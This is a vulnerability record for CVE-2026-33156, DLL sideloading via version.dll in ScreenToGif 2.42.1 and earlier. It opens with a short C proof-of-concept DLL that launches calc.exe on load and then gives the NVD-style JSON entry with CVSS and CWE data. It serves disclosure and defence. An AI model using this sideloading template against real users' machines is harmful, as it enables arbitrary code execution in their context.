CVE-2026-33156

#include <windows.h> #include <stdlib.h> // Entry point for the malicious DLL BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // Code to run when the DLL is loaded by the process // Example: Execute calc.exe to demonstrate arbitrary code execution system("calc.exe"); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } // Export functions to match the expected exports of version.dll // Note: Actual exports may need to match the target's dependency exactly. // This is a simplified PoC structure.

{"cve": {"id": "CVE-2026-33156", "sourceIdentifier": "[email protected]", "published": "2026-03-20T21:17:16.070", "lastModified": "2026-03-27T21:12:37.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ScreenToGif is a screen recording tool. In versions from 2.42.1 and prior, ScreenToGif is vulnerable to DLL sideloading via version.dll . When the portable executable is run from a user-writable directory, it loads version.dll from the application directory instead of the Windows System32 directory, allowing arbitrary code execution in the user's context. This is especially impactful because ScreenToGif is primarily distributed as a portable application intended to be run from user-writable locations. At time of publication, there are no publicly available patches."}, {"lang": "es", "value": "ScreenToGif es una herramienta de grabación de pantalla. En versiones desde la 2.42.1 y anteriores, ScreenToGif es vulnerable a la carga lateral de DLL a través de version.dll. Cuando el ejecutable portátil se ejecuta desde un directorio escribible por el usuario, carga version.dll desde el directorio de la aplicación en lugar del directorio System32 de Windows, permitiendo la ejecución de código arbitrario en el contexto del usuario. Esto es especialmente impactante porque ScreenToGif se distribuye principalmente como una aplicación portátil diseñada para ejecutarse desde ubicaciones escribibles por el usuario. En el momento de la publicación, no hay parches disponibles públicamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}, {"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:screentogif:screentogif:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.42.1", "matchCriteriaId": "09C166C5-125F-4E19-B1A8-A647A44AE43B"}]}]}], "references": [{"url": "https://github.com/NickeManarin/ScreenToGif/security/advisories/GHSA-3fmj-j696-9mg2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/NickeManarin/ScreenToGif/security/advisories/GHSA-3fmj-j696-9mg2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}